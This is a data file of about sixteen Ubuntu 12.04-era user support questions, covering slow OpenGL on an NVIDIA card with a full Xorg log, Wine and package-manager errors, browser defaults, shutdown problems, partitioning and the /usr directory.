130155	whats wrong with my opengl	something is wrong with my opengl after my 12.04 upgrade all opengl apps run slowly . including but not limited to google earth , glxgears , draftsight e.t.c my graphics card : nvidia zotac 6200 this is my glxgears output amith @ amith-desktop : ~ $ glxgears 12 frames in 5.2 seconds = 2.299 fps 12 frames in 5.3 seconds = 2.272 fps 12 frames in 5.3 seconds = 2.257 fps 11 frames in 5.0 seconds = 2.195 fps this is my /var/log/xorg.0.log [ 26.953 ] x.org x server 1.11.3 release date : 2011-12-16 [ 26.953 ] x protocol version 11 , revision 0 [ 26.953 ] build operating system : linux 2.6.24-29-server i686 ubuntu [ 26.953 ] current operating system : linux amith-desktop 3.2.0-24-generic # 37-ubuntu smp wed apr 25 08:43:52 utc 2012 i686 [ 26.953 ] kernel command line : boot_image=/boot/vmlinuz-3.2.0-24-generic root=uuid=3bf6821b-1d5b-4b44-8257-91f2631f7c34 ro crashkernel=384m-2g:64m,2g-:128m quiet splash vt.handoff=7 [ 26.953 ] build date : 04 april 2012 11:58:38pm [ 26.953 ] xorg-server 2:1.11.4-0ubuntu10 ( for technical support please see http : //www.ubuntu.com/support ) [ 26.953 ] current version of pixman : 0.24.4 [ 26.953 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 26.953 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 26.953 ] ( == ) log file : `` /var/log/xorg.0.log '' , time : wed may 2 21:11:36 2012 [ 26.954 ] ( == ) using config file : `` /etc/x11/xorg.conf '' [ 26.954 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 26.954 ] ( == ) no layout section . using the first screen section . [ 26.954 ] ( ** ) | -- > screen `` my screen '' ( 0 ) [ 26.954 ] ( ** ) | | -- > monitor `` < default monitor > '' [ 26.955 ] ( == ) no device specified for screen `` my screen '' . using the first device section listed . [ 26.955 ] ( ** ) | | -- > device `` my card '' [ 26.955 ] ( == ) no monitor specified for screen `` my screen '' . using a default monitor configuration . [ 26.955 ] ( == ) automatically adding devices [ 26.955 ] ( == ) automatically enabling devices [ 26.955 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 26.955 ] entry deleted from font path . [ 26.955 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 26.955 ] entry deleted from font path . [ 26.955 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 26.955 ] entry deleted from font path . [ 26.955 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/100dpi/ : unscaled , /usr/share/fonts/x11/type1 , /usr/share/fonts/x11/100dpi , /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype , built-ins [ 26.955 ] ( == ) modulepath set to `` /usr/lib/i386-linux-gnu/xorg/extra-modules , /usr/lib/xorg/extra-modules , /usr/lib/xorg/modules '' [ 26.956 ] ( ii ) the server relies on udev to provide the list of input devices . if no devices become available , reconfigure udev or disable autoadddevices . [ 26.956 ] ( ii ) loader magic : 0x4595a0 [ 26.956 ] ( ii ) module abi versions : [ 26.956 ] x.org ansi c emulation : 0.4 [ 26.956 ] x.org video driver : 11.0 [ 26.956 ] x.org xinput driver : 16.0 [ 26.956 ] x.org server extension : 6.0 [ 26.957 ] ( -- ) pci : ( 0:0:2:0 ) 8086:2582:1462:7131 rev 14 , mem @ 0xd3000000/524288 , 0xb0000000/268435456 , 0xd3080000/262144 , i/o @ 0x0000e400/8 [ 26.957 ] ( -- ) pci : * ( 0:1:0:0 ) 10de:0221:174b:2017 rev 161 , mem @ 0xd0000000/16777216 , 0xc0000000/268435456 , 0xd1000000/16777216 , bios @ 0x ? ? ? ? ? ? ? ? /131072 [ 26.960 ] ( ii ) open acpi successful ( /var/run/acpid.socket ) [ 26.960 ] ( ii ) loadmodule : `` extmod '' [ 26.984 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libextmod.so [ 26.985 ] ( ii ) module extmod : vendor= '' x.org foundation '' [ 26.985 ] compiled for 1.11.3 , module version = 1.0.0 [ 26.985 ] module class : x.org server extension [ 26.985 ] abi class : x.org server extension , version 6.0 [ 26.985 ] ( ii ) loading extension mit-screen-saver [ 26.985 ] ( ii ) loading extension xfree86-vidmodeextension [ 26.985 ] ( ii ) loading extension xfree86-dga [ 26.985 ] ( ii ) loading extension dpms [ 26.985 ] ( ii ) loading extension xvideo [ 26.985 ] ( ii ) loading extension xvideo-motioncompensation [ 26.985 ] ( ii ) loading extension x-resource [ 26.985 ] ( ii ) loadmodule : `` dbe '' [ 26.985 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdbe.so [ 26.985 ] ( ii ) module dbe : vendor= '' x.org foundation '' [ 26.985 ] compiled for 1.11.3 , module version = 1.0.0 [ 26.985 ] module class : x.org server extension [ 26.985 ] abi class : x.org server extension , version 6.0 [ 26.985 ] ( ii ) loading extension double-buffer [ 26.985 ] ( ii ) loadmodule : `` glx '' [ 26.985 ] ( ii ) loading /usr/lib/i386-linux-gnu/xorg/extra-modules/libglx.so [ 27.135 ] ( ii ) module glx : vendor= '' nvidia corporation '' [ 27.135 ] compiled for 4.0.2 , module version = 1.0.0 [ 27.135 ] module class : x.org server extension [ 27.135 ] ( ii ) nvidia glx module 295.40 thu apr 5 21:49:54 pdt 2012 [ 27.135 ] ( ii ) loading extension glx [ 27.135 ] ( ii ) loadmodule : `` record '' [ 27.138 ] ( ii ) loading /usr/lib/xorg/modules/extensions/librecord.so [ 27.139 ] ( ii ) module record : vendor= '' x.org foundation '' [ 27.139 ] compiled for 1.11.3 , module version = 1.13.0 [ 27.139 ] module class : x.org server extension [ 27.139 ] abi class : x.org server extension , version 6.0 [ 27.139 ] ( ii ) loading extension record [ 27.139 ] ( ii ) loadmodule : `` dri '' [ 27.140 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri.so [ 27.141 ] ( ii ) module dri : vendor= '' x.org foundation '' [ 27.141 ] compiled for 1.11.3 , module version = 1.0.0 [ 27.142 ] abi class : x.org server extension , version 6.0 [ 27.142 ] ( ii ) loading extension xfree86-dri [ 27.142 ] ( ii ) loadmodule : `` dri2 '' [ 27.143 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri2.so [ 27.144 ] ( ii ) module dri2 : vendor= '' x.org foundation '' [ 27.145 ] compiled for 1.11.3 , module version = 1.2.0 [ 27.145 ] abi class : x.org server extension , version 6.0 [ 27.145 ] ( ii ) loading extension dri2 [ 27.145 ] ( ii ) loadmodule : `` nvidia '' [ 27.145 ] ( ii ) loading /usr/lib/i386-linux-gnu/xorg/extra-modules/nvidia_drv.so [ 27.148 ] ( ii ) module nvidia : vendor= '' nvidia corporation '' [ 27.148 ] compiled for 4.0.2 , module version = 1.0.0 [ 27.148 ] module class : x.org video driver [ 27.148 ] ( ii ) nvidia dlloader x driver 295.40 thu apr 5 21:29:50 pdt 2012 [ 27.148 ] ( ii ) nvidia unified driver for all supported nvidia gpus [ 27.148 ] ( ++ ) using vt number 7 [ 27.149 ] ( ii ) loading sub module `` fb '' [ 27.149 ] ( ii ) loadmodule : `` fb '' [ 27.150 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 27.150 ] ( ii ) module fb : vendor= '' x.org foundation '' [ 27.150 ] compiled for 1.11.3 , module version = 1.0.0 [ 27.150 ] abi class : x.org ansi c emulation , version 0.4 [ 27.150 ] ( ii ) loading sub module `` wfb '' [ 27.150 ] ( ii ) loadmodule : `` wfb '' [ 27.150 ] ( ii ) loading /usr/lib/xorg/modules/libwfb.so [ 27.150 ] ( ii ) module wfb : vendor= '' x.org foundation '' [ 27.150 ] compiled for 1.11.3 , module version = 1.0.0 [ 27.150 ] abi class : x.org ansi c emulation , version 0.4 [ 27.150 ] ( ii ) loading sub module `` ramdac '' [ 27.151 ] ( ii ) loadmodule : `` ramdac '' [ 27.151 ] ( ii ) module `` ramdac '' already built-in [ 27.151 ] ( ii ) loading /usr/lib/i386-linux-gnu/xorg/extra-modules/nvidia_drv.so [ 27.151 ] ( ii ) loading /usr/lib/xorg/modules/libwfb.so [ 27.151 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 27.151 ] ( ii ) nvidia ( 0 ) : creating default display subsection in screen section `` my screen '' for depth/fbbpp 24/32 [ 27.151 ] ( == ) nvidia ( 0 ) : depth 24 , ( == ) framebuffer bpp 32 [ 27.151 ] ( == ) nvidia ( 0 ) : rgb weight 888 [ 27.151 ] ( == ) nvidia ( 0 ) : default visual is truecolor [ 27.151 ] ( == ) nvidia ( 0 ) : using gamma correction ( 1.0 , 1.0 , 1.0 ) [ 27.151 ] ( ** ) nvidia ( 0 ) : option `` nologo '' `` true '' [ 27.151 ] ( ** ) nvidia ( 0 ) : option `` registrydwords '' `` enablebrightnesscontrol=1 '' [ 27.151 ] ( ** ) nvidia ( 0 ) : enabling 2d acceleration [ 29.071 ] ( ii ) nvidia ( gpu-0 ) : display ( samsung sa300/sa350 ( crt-0 ) ) does not support nvidia [ 29.071 ] ( ii ) nvidia ( gpu-0 ) : 3d vision stereo . [ 29.073 ] ( ii ) nvidia ( 0 ) : nvidia gpu geforce 6200 ( nv44 ) at pci:1:0:0 ( gpu-0 ) [ 29.073 ] ( -- ) nvidia ( 0 ) : memory : 524288 kbytes [ 29.073 ] ( -- ) nvidia ( 0 ) : videobios : 05.44.a2.11.00 [ 29.073 ] ( -- ) nvidia ( 0 ) : interlaced video modes are supported on this gpu [ 29.073 ] ( -- ) nvidia ( 0 ) : connected display device ( s ) on geforce 6200 at pci:1:0:0 [ 29.074 ] ( -- ) nvidia ( 0 ) : samsung sa300/sa350 ( crt-0 ) [ 29.074 ] ( -- ) nvidia ( 0 ) : samsung sa300/sa350 ( crt-0 ) : 400.0 mhz maximum pixel clock [ 29.074 ] ( ** ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display [ 29.074 ] ( ** ) nvidia ( 0 ) : device samsung sa300/sa350 ( crt-0 ) ( using edid frequencies [ 29.074 ] ( ** ) nvidia ( 0 ) : has been enabled on all display devices . ) [ 29.074 ] ( ii ) nvidia ( 0 ) : assigned display device : crt-0 [ 29.074 ] ( == ) nvidia ( 0 ) : [ 29.074 ] ( == ) nvidia ( 0 ) : no modes were requested ; the default mode `` nvidia-auto-select '' [ 29.075 ] ( == ) nvidia ( 0 ) : will be used as the requested mode . [ 29.075 ] ( == ) nvidia ( 0 ) : [ 29.075 ] ( ii ) nvidia ( 0 ) : validated modes : [ 29.075 ] ( ii ) nvidia ( 0 ) : `` nvidia-auto-select '' [ 29.075 ] ( ii ) nvidia ( 0 ) : virtual screen size determined to be 1600 x 900 [ 29.082 ] ( -- ) nvidia ( 0 ) : dpi set to ( 92 , 91 ) ; computed from `` useediddpi '' x config [ 29.082 ] ( -- ) nvidia ( 0 ) : option [ 29.082 ] ( -- ) depth 24 pixmap format is 32 bpp [ 29.103 ] ( ii ) nvidia ( 0 ) : setting mode `` nvidia-auto-select '' [ 29.199 ] ( ii ) loading extension nv-glx [ 29.285 ] ( == ) nvidia ( 0 ) : disabling shared memory pixmaps [ 29.285 ] ( == ) nvidia ( 0 ) : backing store disabled [ 29.285 ] ( == ) nvidia ( 0 ) : silken mouse enabled [ 29.286 ] ( == ) nvidia ( 0 ) : dpms enabled [ 29.286 ] ( ii ) loading extension nv-control [ 29.286 ] ( ii ) loading extension xinerama [ 29.286 ] ( ii ) loading sub module `` dri2 '' [ 29.286 ] ( ii ) loadmodule : `` dri2 '' [ 29.287 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri2.so [ 29.287 ] ( ii ) module dri2 : vendor= '' x.org foundation '' [ 29.287 ] compiled for 1.11.3 , module version = 1.2.0 [ 29.287 ] abi class : x.org server extension , version 6.0 [ 29.287 ] ( ii ) nvidia ( 0 ) : [ dri2 ] setup complete [ 29.287 ] ( ii ) nvidia ( 0 ) : [ dri2 ] vdpau driver : nvidia [ 29.287 ] ( == ) randr enabled [ 29.287 ] ( ii ) initializing built-in extension generic event extension [ 29.287 ] ( ii ) initializing built-in extension shape [ 29.287 ] ( ii ) initializing built-in extension mit-shm [ 29.287 ] ( ii ) initializing built-in extension xinputextension [ 29.287 ] ( ii ) initializing built-in extension xtest [ 29.287 ] ( ii ) initializing built-in extension big-requests [ 29.287 ] ( ii ) initializing built-in extension sync [ 29.287 ] ( ii ) initializing built-in extension xkeyboard [ 29.287 ] ( ii ) initializing built-in extension xc-misc [ 29.287 ] ( ii ) initializing built-in extension security [ 29.287 ] ( ii ) initializing built-in extension xinerama [ 29.287 ] ( ii ) initializing built-in extension xfixes [ 29.287 ] ( ii ) initializing built-in extension render [ 29.287 ] ( ii ) initializing built-in extension randr [ 29.287 ] ( ii ) initializing built-in extension composite [ 29.287 ] ( ii ) initializing built-in extension damage [ 29.300 ] ( ii ) initializing extension glx [ 29.384 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-b20d7fc79c7f597315e3e501aef10e0d866e8e92.xkm [ 29.395 ] ( ii ) config/udev : adding input device power button ( /dev/input/event1 ) [ 29.395 ] ( ** ) power button : applying inputclass `` evdev keyboard catchall '' [ 29.395 ] ( ii ) loadmodule : `` evdev '' [ 29.395 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 29.400 ] ( ii ) module evdev : vendor= '' x.org foundation '' [ 29.400 ] compiled for 1.11.3 , module version = 2.7.0 [ 29.400 ] module class : x.org xinput driver [ 29.400 ] abi class : x.org xinput driver , version 16.0 [ 29.400 ] ( ii ) using input driver 'evdev ' for 'power button' [ 29.400 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 29.400 ] ( ** ) power button : always reports core events [ 29.400 ] ( ** ) evdev : power button : device : `` /dev/input/event1 '' [ 29.400 ] ( -- ) evdev : power button : vendor 0 product 0x1 [ 29.400 ] ( -- ) evdev : power button : found keys [ 29.400 ] ( ii ) evdev : power button : configuring as keyboard [ 29.400 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/lnxpwrbn:00/input/input1/event1 '' [ 29.400 ] ( ii ) xinput : adding extended input device `` power button '' ( type : keyboard , id 6 ) [ 29.400 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 29.400 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 29.400 ] ( ** ) option `` xkb_layout '' `` us '' [ 29.401 ] ( ii ) config/udev : adding input device power button ( /dev/input/event0 ) [ 29.401 ] ( ** ) power button : applying inputclass `` evdev keyboard catchall '' [ 29.401 ] ( ii ) using input driver 'evdev ' for 'power button' [ 29.401 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 29.401 ] ( ** ) power button : always reports core events [ 29.401 ] ( ** ) evdev : power button : device : `` /dev/input/event0 '' [ 29.402 ] ( -- ) evdev : power button : vendor 0 product 0x1 [ 29.402 ] ( -- ) evdev : power button : found keys [ 29.402 ] ( ii ) evdev : power button : configuring as keyboard [ 29.402 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/device:00/pnp0c0c:00/input/input0/event0 '' [ 29.402 ] ( ii ) xinput : adding extended input device `` power button '' ( type : keyboard , id 7 ) [ 29.402 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 29.402 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 29.402 ] ( ** ) option `` xkb_layout '' `` us '' [ 29.403 ] ( ii ) config/udev : adding input device logitech optical usb mouse ( /dev/input/event3 ) [ 29.403 ] ( ** ) logitech optical usb mouse : applying inputclass `` evdev pointer catchall '' [ 29.403 ] ( ii ) using input driver 'evdev ' for 'logitech optical usb mouse' [ 29.403 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 29.403 ] ( ** ) logitech optical usb mouse : always reports core events [ 29.403 ] ( ** ) evdev : logitech optical usb mouse : device : `` /dev/input/event3 '' [ 29.403 ] ( -- ) evdev : logitech optical usb mouse : vendor 0x46d product 0xc016 [ 29.403 ] ( -- ) evdev : logitech optical usb mouse : found 3 mouse buttons [ 29.403 ] ( -- ) evdev : logitech optical usb mouse : found scroll wheel ( s ) [ 29.403 ] ( -- ) evdev : logitech optical usb mouse : found relative axes [ 29.403 ] ( -- ) evdev : logitech optical usb mouse : found x and y relative axes [ 29.403 ] ( ii ) evdev : logitech optical usb mouse : configuring as mouse [ 29.403 ] ( ii ) evdev : logitech optical usb mouse : adding scrollwheel support [ 29.403 ] ( ** ) evdev : logitech optical usb mouse : yaxismapping : buttons 4 and 5 [ 29.403 ] ( ** ) evdev : logitech optical usb mouse : emulatewheelbutton : 4 , emulatewheelinertia : 10 , emulatewheeltimeout : 200 [ 29.403 ] ( ** ) option `` config_info '' `` udev : /sys/devices/pci0000:00/0000:00:1d.1/usb3/3-1/3-1.1/3-1.1:1.0/input/input3/event3 '' [ 29.403 ] ( ii ) xinput : adding extended input device `` logitech optical usb mouse '' ( type : mouse , id 8 ) [ 29.403 ] ( ii ) evdev : logitech optical usb mouse : initialized for relative axes . [ 29.407 ] ( ** ) logitech optical usb mouse : ( accel ) keeping acceleration scheme 1 [ 29.407 ] ( ** ) logitech optical usb mouse : ( accel ) acceleration profile 0 [ 29.407 ] ( ** ) logitech optical usb mouse : ( accel ) acceleration factor : 2.000 [ 29.407 ] ( ** ) logitech optical usb mouse : ( accel ) acceleration threshold : 4 [ 29.408 ] ( ii ) config/udev : adding input device logitech optical usb mouse ( /dev/input/mouse0 ) [ 29.408 ] ( ii ) no input driver specified , ignoring this device . [ 29.408 ] ( ii ) this device may have been added with another device file . [ 29.408 ] ( ii ) config/udev : adding input device at translated set 2 keyboard ( /dev/input/event2 ) [ 29.408 ] ( ** ) at translated set 2 keyboard : applying inputclass `` evdev keyboard catchall '' [ 29.408 ] ( ii ) using input driver 'evdev ' for 'at translated set 2 keyboard' [ 29.408 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 29.408 ] ( ** ) at translated set 2 keyboard : always reports core events [ 29.408 ] ( ** ) evdev : at translated set 2 keyboard : device : `` /dev/input/event2 '' [ 29.409 ] ( -- ) evdev : at translated set 2 keyboard : vendor 0x1 product 0x1 [ 29.409 ] ( -- ) evdev : at translated set 2 keyboard : found keys [ 29.409 ] ( ii ) evdev : at translated set 2 keyboard : configuring as keyboard [ 29.409 ] ( ** ) option `` config_info '' `` udev : /sys/devices/platform/i8042/serio0/input/input2/event2 '' [ 29.409 ] ( ii ) xinput : adding extended input device `` at translated set 2 keyboard '' ( type : keyboard , id 9 ) [ 29.409 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 29.409 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 29.409 ] ( ** ) option `` xkb_layout '' `` us '' [ 262.405 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-03af3717ff3ab439a4baaba686ccb40771cdf520.xkm [ 262.413 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-03af3717ff3ab439a4baaba686ccb40771cdf520.xkm [ 267.908 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-2320486fa1f45b423a1eb1afc5f5271cba16f9c3.xkm [ 269.484 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-2320486fa1f45b423a1eb1afc5f5271cba16f9c3.xkm [ 269.512 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-2320486fa1f45b423a1eb1afc5f5271cba16f9c3.xkm [ 269.519 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-2320486fa1f45b423a1eb1afc5f5271cba16f9c3.xkm [ 269.526 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-2320486fa1f45b423a1eb1afc5f5271cba16f9c3.xkm [ 269.532 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-2320486fa1f45b423a1eb1afc5f5271cba16f9c3.xkm [ 269.539 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-2320486fa1f45b423a1eb1afc5f5271cba16f9c3.xkm [ 269.545 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-2320486fa1f45b423a1eb1afc5f5271cba16f9c3.xkm [ 269.552 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-2320486fa1f45b423a1eb1afc5f5271cba16f9c3.xkm [ 269.558 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-2320486fa1f45b423a1eb1afc5f5271cba16f9c3.xkm [ 269.566 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-2320486fa1f45b423a1eb1afc5f5271cba16f9c3.xkm [ 269.572 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-2320486fa1f45b423a1eb1afc5f5271cba16f9c3.xkm [ 269.578 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-2320486fa1f45b423a1eb1afc5f5271cba16f9c3.xkm [ 269.585 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-2320486fa1f45b423a1eb1afc5f5271cba16f9c3.xkm [ 269.592 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-2320486fa1f45b423a1eb1afc5f5271cba16f9c3.xkm [ 269.598 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-2320486fa1f45b423a1eb1afc5f5271cba16f9c3.xkm [ 799.413 ] [ mi ] increasing eq size to 512 to prevent dropped events .
130157	how to install 3ds max 2009 on ubuntu using wine	i see on winehq.org website is gold support for 3ds max 2009 application . but when i install it alert me that the .net 2008 sp1 is error and i can not continue to install this program .
130158	how do i make thunderbird open links in chromium ?	using xubuntu 12.04 i want to be able to click links in thunderbird emails and have them open in chromium ( package name chromium-browser ) . instead , they open in firefox . i have tried the following : 1 ) xfce preferred applications ( chromium is not listed , so i had to hunt down the executable ) -- next time i run chromium , it complains that it is no longer the default browser . 2 ) telling chromium to set itself as the default browser . thunderbird opens links in firefox . 3 ) update-alternatives . it 's already listed as an alternative at the same priority as firefox . the `` open web browser '' app menu item opens chromium . thunderbird opens links in firefox . i have looked through the entire preferences gui in thunderbird ( but not the advanced config editor yet ) and seen nothing that mentions what browser to open links in . please note that this is not google chrome .
130160	ubuntu 12.04 does a restart instead of a shutdown	i recently upgraded from ubuntu 11.10 to 12.04 on my dell latitude d630c . now , when i want to shut down the system does shut down but then starts up again immediately . it 's like it does a reboot instead of a shut down .
130161	12.04 install partition tool doesnt have ntfs available	i want to manually partition my disk for install . installing 12.04 only on this laptop , so i create a / , swap , /boot and /home ( all ext4 ) and then i want to create a ntfs for sharing data between ubu and my windows vm . but the manual partition tool in the install doesnt have ntfs as a filesystem type in the drop down , only fat or fat32.. how come ?
130166	two 12.04 versions on one machine . cant access data	i wanted to upgrade from 11.04 to 12.04 . shame on me , but i too late noticed that my powercord was out of machine and as a result of that in the upgrading process my laptop switched of . when turned on it shows black screen with icons , but no possibility to move mouse or do anything else . i made bootable usb stick with 12.04 version . it took a long time to split ( ? ) hd and install it . it looks like itš working fine , but the thing is that i cant access my files and folders - every thing is just empty . so the question is how can i get my files back there are two ubuntu 12.04 on my machine , but when i switched on there is a list of options to choose , but starts one version of them with no files . is there a way to get my files back ?
130170	problem video nvidia ubuntu 12.04	i just did a fresh install of ubuntu 12.04 on my pc ( dell precision 370 ) but the video is not working as it should . problems : when i log in to unity 3d i get a transparent bar ( where the firefox , libre office , etc icons are ) but i can see the tooltips when i put my mouse over where the icons are , i can see the top toolbar with no problem and i see just white on the rest of the desktop ! when i log in using unity 2d i see the left bar cut in half ( so i ca n't see the trash icon that is at the botton ) , the toolbar at the top shows ok and the desktop show ok but with some apps . for example , if i open a terminal and maximize it , it will only show just where the left toolbar `` cuts '' . but if i open firefox it will open fine . config : my pc comes with a nvidia quadro nvs 280 and i see that by default ubuntu is using the nouveau driver . workarounds tried : i tried uninstalling the nouveau driver and the desktop works fine but i can use only unity 2d . i tried installing the nvidia-173 drivers using synaptic but i get `` could not apply changes ! fix broken packages first '' . i go to `` edit - > fix broken packages '' and i get the error : `` e : unable to correct problem , you have held broken packages.e : error , pkgproblemresolver : :resolve generated breakes , this may be caused by held packages.e : unable to correct dependencies '' output of lspci : 01:00.0 vga compatible controller : nvidia corporation nv37gl [ quadro pci-e series ] ( rev a2 ) any idea so as to what i should do ? thanks in advance for any help . ps : ah , the nvidia-173 driver was working fine on ubuntu 10.04 .
130171	why ca n't i switch between open windows in 12.04 ?	i recently did a clean install of 12.04 ( ubuntu flavour ) onto various pcs and not a single one is capable of switching between a program 's open windows in unity the way you could in 11.10 ( by double clicking the launcher ) . is this a bug or a feature ?
130173	after upgrade from 11.04 to 12.04 my laptop does not turn on without the power supply	i saw that this questions was previously asked from other version of ubuntu , and no one seems to have an answer . how can i fix this ? . how can i check also if is a bettery problem ( the battery does not charge anymore also ) please ! ! !
130174	vertical scroll does n't work in some applications on a dell inspiron 14r	i just installed ubuntu 12.04 and installed all the necessary updates and gnome shell . i have ticked `` enable horizontal scrolling '' and `` edge scrolling '' in touchpad settings . the scrolling works well in browsers and music players . but the touchpad ( vertical ) scroll does n't work in some specific apps . ( system monitor and file manager are one of them ) is there any way to fix it ?
130176	problem to upgrade from 11.10 to 12.04	in the update manager , 12.04 was available . i started the download ( 700m aprox ) , but my internet connection crashed and i could n't complete the dowload ( remainde 100m aprox. ) . the downloads until this point were installed , but my system did n't upgrade to 12.04 , it remained in 11.10 . the problem is , the 12.04 update does n't show in the update manager . how can i upgrade ? can i undo the ( partial ) installation done ? thanks in advance , i 'm novice using linux/ubuntu
130178	how much minimum space ubuntu 12.04 installation requires	i have a windows installation and only one partition in my hard disk as in there is only c drive . i want to install ubuntu 12.04 alongside it but i am not sure how much disk space i must allocate for ubuntu . actualy i just have 12gb space left on my harddisk and i am wondering if an ubuntu installation can be effectively made in such a small space or not . please help . thanks
130180	ca n't unmute sound after playing video	i 'm running ubuntu on a toshiba c660 ( 4gb ram , intel core i5 ) . my soundboard is integrated and after trying to play a song on youtube my volume is muted . i ca n't unmute it ( appears like it 's unmuted , but it 's mute )
130181	how to delete entries after uninstalling softwares	after un-istalling a particular software , the entries created by the specific software during its use will be in place even after un-istallation . the entries i talk here about the hidden files present in the home folder under the name `` . '' folder . my question is even the size of the files are very few kbs , how do these files could be deleted easily ? if we wo n't delete these folders and once again install the same software , does there a high probability of using the same old entries in the software no ? i had observed that after subsequent up gradations the 'dot file/hidden file ' entries increases when some of the softwares are de-faulty installed wth fresh installations . so is there some way to remove it ?
130182	item can not be installed or removed until the package catalogue is repaired	after installing microsoft windows compatibility layer ( meta-package ) i receive an error item can not be installed or removed until the package catalogue is repaired . do you want to repair it ok , i thought ... i 'll just click repair and be done with it . after doing so i receive another error . the full text reads : installarchives ( ) failed : ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 212945 files and directories currently installed . ) unpacking libasound2 : i386 ( from ... /libasound2_1.0.25-1ubuntu10_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/libasound2_1.0.25-1ubuntu10_i386.deb ( -- unpack ) : './usr/share/alsa/cards/ice1712.conf ' is different from the same file on the system dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/libasound2_1.0.25-1ubuntu10_i386.deb error in function : systemerror : e : sub-process /usr/bin/dpkg returned an error code ( 1 ) dpkg : dependency problems prevent configuration of wine1.4-i386 : i386 : wine1.4-i386 : i386 depends on libasound2 ( > = 1.0.23 ) ; however : package libasound2 : i386 is not installed . dpkg : error processing wine1.4-i386 : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of wine1.4 : wine1.4 depends on wine1.4-i386 ( = 1.4-0ubuntu4 ) ; however : package wine1.4-i386 is not installed . package wine1.4-i386 : i386 is not configured yet . dpkg : error processing wine1.4 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of wine : wine depends on wine1.4 ; however : package wine1.4 is not configured yet . dpkg : error processing wine ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of wine1.4-common : wine1.4-common depends on wine1.4 ( = 1.4-0ubuntu4 ) ; however : package wine1.4 is not configured yet . dpkg : error processing wine1.4-common ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of wine1.4-amd64 : wine1.4-amd64 depends on wine1.4-common ( = 1.4-0ubuntu4 ) ; however : package wine1.4-common is not configured yet . dpkg : error processing wine1.4-amd64 ( -- configure ) : dependency problems - leaving unconfigured so i click ok and now i 'm back to previous screen ( `` item can not be installed ... '' ) i click on cancel and go to the red circle on the top right on my screen and try to update from there and receive this error after that i just get thrown these errors so now i ca n't add or remove any programs on my system . does anyone have any idea how to fix this ?
130186	what is the rationale for the `/usr` directory ?	what is the rationale for the `` unix system resources '' , or /usr directory , as described here , which duplicates many of the directory names under the root directory / ? my purpose : i 'm installing oracle jdk for the umpteenth time and decided this time to just put it under /home/user and i 'm just reading around a bit to see if it is a bad idea on a single user machine .
